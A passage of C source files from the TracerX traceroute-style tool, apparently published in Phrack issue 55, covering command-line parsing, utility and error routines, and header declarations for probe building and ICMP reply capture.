+                usage(argv[0]);
+        }
+    }
+
+    /*
+     *  Parse the command line for the destination host and possible
+     *  packetlength.
+     */
+    switch (argc - optind)
+    {
+        case 2:
+            /*
+             *  User specified packetlength (optional).  This will later
+             *  be verified and adjusted if necessary.
+             */
+            tx_c->packet_size = tx_str2int(argv[optind + 1], "packet length",
+                PACKET_MIN, PACKET_MAX);
+            /* FALLTHROUGH */
+        case 1:
+            /* Host (required). */
+            tx_c->host = libnet_name_resolve(argv[optind], 1);
+            if (tx_c->host == -1)
+            {
+                tx_error(FATAL, "Cannot resolve host IP address\n");
+            }
+            break;
+        default:
+            usage(argv[0]);
+    }
+
+    /*
+     *  Bring up the network components.
+     */
+    if (tx_init_network(&tx_c, err_buf) == -1)
+    {
+        tx_error(FATAL, "Cannot initialize the network: %s\n", err_buf);
+    }
+
+    /*
+     *  Start the game!
+     */
+    tx_do_scan(&tx_c);
+
+    /*
+     *  Stop the game!
+     */
+    tx_shutdown(&tx_c);
+
+    return (EXIT_SUCCESS);
+}
+
+
+void
+usage(char *argv0)
+{
+    fprintf(stderr,
+            "\nUsage : %s [options] host [packetlength]\n"
+            "\t\t   [-b] burst rate\n"
+            "\t\t   [-F] IP_DF\n"
+            "\t\t   [-f] base IP TTL\n"
+            "\t\t   [-g] loose source routing\n"
+            "\t\t   [-H] verbose help\n"
+            "\t\t   [-h] help\n"
+            "\t\t   [-I] use ICMP\n"
+            "\t\t   [-i] specify interface\n"
+            "\t\t   [-m] max IP TTL (hopcount)\n"
+            "\t\t   [-n] do not resolve IP addresses into hostnames\n"
+            "\t\t   [-P] transport protocol (supercedes -I)\n"
+            "\t\t   [-p] base TCP/UDP port number (destination)\n"
+            "\t\t   [-q] number of probes\n"
+            "\t\t   [-S] do not increment TCP/UDP port numbers (static)\n"
+            "\t\t   [-s] base TCP/UDP port number (source)\n"
+            "\t\t   [-t] IP TOS\n"
+            "\t\t   [-V] version information\n"
+            "\t\t   [-v] verbose output\n"
+            "\t\t   [-w] wait (in seconds)\n"
+            "\n",   argv0);
+        exit(EXIT_FAILURE);
+}
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_report.c !04c69fdd
+/*
+ *  $Id: tx_report.c,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
+ *
+ *  Tracerx
+ *  tx_report.c - reporting and printing module
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_struct.h"
+#include "./tx_packet_capture.h"
+
+
+void
+tx_report(int class, u_char *packet, struct tx_control **tx_c)
+{
+    switch (class)
+    {
+        case TX_PACKET_IS_EXPIRED:
+            break;
+        case TX_PACKET_IS_TERMINAL:
+            break;
+        case TX_PACKET_IS_UNREACH_EN_ROUTE:
+            break;
+        default:
+            break;
+    }
+}
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_util.c !29dd0492
+/*
+ *  $Id: tx_util.c,v 1.2 1999/05/29 20:28:43 route Exp $
+ *
+ *  Tracerx
+ *  tx_util.c - various routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_main.h"
+#include "./tx_struct.h"
+#include "./tx_util.h"
+#include "./tx_error.h"
+
+int
+tx_str2int(register const char *str, register const char *what,
+    register int min, register int max)
+{
+    register const char *cp;
+    register int val;
+    char *ep;
+
+    if (str[0] == '0' && (str[1] == 'x' || str[1] == 'X'))
+    {
+        cp = str + 2;
+        val = (int)strtol(cp, &ep, 16);
+    }
+    else
+    {
+        val = (int)strtol(str, &ep, 10);
+    }
+
+    if (*ep != '\0')
+    {
+        tx_error(FATAL, "\"%s\" bad value for %s \n", str, what);
+    }
+    if (val < min && min >= 0)
+    {
+        if (min == 0)
+        {
+            tx_error(FATAL, "%s must be >= %d\n", what, min);
+        }
+        else
+        {
+            tx_error(FATAL, "%s must be > %d\n", what, min - 1);
+        }
+    }
+    if (val > max && max >= 0)
+    {
+        tx_error(FATAL, "%s must be <= %d\n", what, max);
+    }
+    return (val);
+}
+
+
+int
+tx_prot_select(char *protocol, struct tx_control **tx_c)
+{
+    char *supp_protocols[] = {"UDP", "TCP", "ICMP", 0};
+    int i;
+
+    for (i = 0; supp_protocols[i]; i++)
+    {
+        if ((!strcasecmp(supp_protocols[i], protocol)))
+        {
+            switch (i)
+            {
+                case 0:
+                    /* UDP */
+                    (*tx_c)->packet_size = IP_H + UDP_H + TX_P;
+                    return (IPPROTO_UDP);
+                case 1:
+                    /* TCP */
+                    (*tx_c)->packet_size = IP_H + TCP_H + TX_P;
+                    return (IPPROTO_TCP);
+                case 2:
+                    /* ICMP */
+                    (*tx_c)->packet_size = IP_H + ICMP_ECHO_H + TX_P;
+                    return (IPPROTO_ICMP);
+                default:
+                    tx_error(FATAL, "Unknown protocol: %s\n", protocol);
+            }
+        }
+    }
+    tx_error(FATAL, "Unknown protocol: %s\n", protocol);
+    /* UNREACHED (silences compiler warnings) */
+    return (-1);
+}
+
+
+int
+tx_get_hwaddrs(struct ether_addr **l, struct ether_addr **r,
+        struct tx_control **tx_c, u_char *errbuf)
+{
+    *l = get_hwaddr((*tx_c)->l, (*tx_c)->device, errbuf);
+    if (l == NULL)
+    {
+        return (-1);
+    }
+}
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_error.c !1962d944
+/*
+ *  $Id: tx_error.c,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
+ *
+ *  Tracerx
+ *  tx_error.c - error handling routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_main.h"
+#include "./tx_error.h"
+
+void
+tx_error(int severity, char *msg, ...)
+{
+    va_list ap;
+    char buf[BUFSIZ];
+
+    va_start(ap, msg);
+    vsnprintf(buf, sizeof(buf) - 1, msg, ap);
+
+    switch (severity)
+    {
+        case WARNING:
+            fprintf(stderr, "Warning: ");
+            break;
+        case CRITICAL:
+            fprintf(stderr, "Critical: ");
+            break;
+        case FATAL:
+            fprintf(stderr, "Fatal: ");
+            break;
+    }
+    fprintf(stderr, "%s", buf);
+    va_end(ap);
+
+    if (severity == FATAL)
+    {
+        exit(EXIT_FAILURE);
+    }
+}
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_framework.h !4bc795bb
+/*
+ *  $Id: tx_framework.h,v 1.3 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _TX_TRACERX_H
+#define _TX_TRACERX_H
+
+#define TX_STATIC_PORTS 0x1
+
+#define PACKET_MIN      IP_H + UDP_H + TX_P
+                                    /* min packet size */
+#define PACKET_MAX      1500        /* max packet size */
+#define BURST_RATE_MAX  30          /* max burst rate */
+#define IP_TTL_MAX      255         /* max IP TTL */
+#define PORT_MAX        65535       /* max port */
+#define PROBE_MAX       100         /* max probe count per round */
+#define WAIT_MAX        360         /* max time to wait for responses */
+#define PCAP_BUFSIZ     576         /* bytes per packet we can capture */
+
+int
+tx_init_control(
+    struct tx_control **
+    );
+
+int
+tx_init_network(
+    struct tx_control **,
+    char *
+    );
+
+int
+tx_do_scan(
+    struct tx_control **
+    );
+
+int
+tx_shutdown(
+    struct tx_control **
+    );
+
+#endif /* _TX_TRACERX_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_build.h !6de4be5c
+/*
+ *  $Id: tx_packet_build.h,v 1.3 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  High-level packet construction routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _TX_PACKET_BUILD_H
+#define _TX_PACKET_BUILD_H
+
+
+int
+tx_packet_build_probe(
+    struct tx_control **
+    );
+
+
+int
+tx_packet_build_payload(
+    struct tx_control **,
+    int
+    );
+
+
+int
+tx_packet_build_udp(
+    struct tx_control **
+    );
+
+
+int
+tx_packet_build_tcp(
+    struct tx_control **
+    );
+
+
+int
+tx_packet_build_icmp(
+    struct tx_control **
+    );
+
+
+int
+tx_packet_update_probe(
+    struct tx_control **
+    );
+
+#endif /* _TX_PACKET_BUILD_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_inject.h !9b8fc656
+/*
+ *  $Id: tx_packet_inject.h,v 1.3 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  High-level packet injection routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _TX_PACKET_INJECT_H
+#define _TX_PACKET_INJECT_H
+
+int
+tx_packet_inject(
+    struct tx_control **
+    );
+
+#endif /* _TX_PACKET_INJECT_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_verify.h !a40d5aef
+/*
+ *  $Id$
+ *
+ *  Tracerx
+ *  packet verification routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _TX_PACKET_VERIFY_H
+#define _TX_PACKET_VERIFY_H
+
+
+int
+tx_packet_verify_udp(
+    char *,
+    struct tx_control **
+    );
+
+
+int
+tx_packet_verify_tcp(
+    char *,
+    struct tx_control **
+    );
+
+
+int
+tx_packet_verify_icmp(
+    char *, 
+    struct tx_control **
+    );
+
+
+#endif /* _TX_PACKET_VERIFY_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_filter.h !f4dbb92f
+/*
+ *  $Id: tx_packet_filter.h,v 1.1 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  packet filtering routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _TX_PACKET_FILTER_H
+#define _TX_PACKET_FILTER_H
+
+/*
+ *  Since we are not putting the interface into promiscuous mode, we don't
+ *  need to sift through packets looking for our IP; this simplfies our
+ *  filter language.  For each scan type, we of course need to receive
+ *  ICMP TTL expired in transit type messages (ICMP type 11).
+ *  For UDP, our terminal packet is an unreachable (ICMP type 3).
+ *  For TCP, our terminal packet is a TCP RST (or an RST/ACK).
+ *  For ICMP, our terminal packet is an ICMP echo reply.
+ *  However, for the last two, we need to be prepared for unreachables as
+ *  network conditions are unpredictable.
+ */
+ 
+#define TX_BPF_FILTER_UDP  "icmp[0] == 11 or icmp[0] == 3"
+#define TX_BPF_FILTER_TCP  "icmp[0] == 11 or icmp[0] == 3 or tcp[14] == 0x12 \
+                            or tcp[14] == 0x4 or tcp[14] == 0x14"
+#define TX_BPF_FILTER_ICMP "icmp[0] == 11 or icmp[0] == 3 or icmp[0] == 0"
+
+int
+tx_set_pcap_filter(
+    char *,             /* filter code to install */
+    struct tx_control **
+    );
+
+#endif /* _TX_PACKET_FILTER_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_capture.h !be216cbf
+/*
+ *  $Id: tx_packet_capture.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
+ *
+ *  Tracerx
+ *  High-level packet injection routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _TX_PACKET_CAPTURE_H
+#define _TX_PACKET_CAPTURE_H
+
+#define TX_PACKET_IS_BORING             0
+#define TX_PACKET_IS_EXPIRED            1
+#define TX_PACKET_IS_TERMINAL           2
+#define TX_PACKET_IS_TERMINAL_EXOTIC    3
+#define TX_PACKET_IS_UNREACH_EN_ROUTE   4
+
+int
+tx_packet_snatcher(
+    struct tx_control **
+    );
+
+
+
+#endif /* _TX_PACKET_CAPTURE_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_main.h !1526759a
+/*
+ *  $Id: tx_main.h,v 1.2 1999/05/29 20:28:42 route Exp $
+ *
+ *  TracerX
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _MAIN_H
+#define _MAIN_H
+
+#include <stdarg.h>
+#include <pcap.h>
+#include <libnet.h>
+
+#define BANNER  "TracerX (c) 1999 Mike D. Schiffman <mike@infonexus.com> and \
+Jeremy F. Rauch\n<jrauch@cadre.org>.  Distribution is unlimited provided due \
+credit is given and no fee is charged.\n\nhttp://www.packetfactory.net/tracerx \
+for more information.\n"
+
+void
+usage(
+    char *
+    );
+
+#endif /* _MAIN_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_report.h !05ed6ef4
+/*
+ *  $Id$
+ *
+ *  Tracerx
+ *  Report generation routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
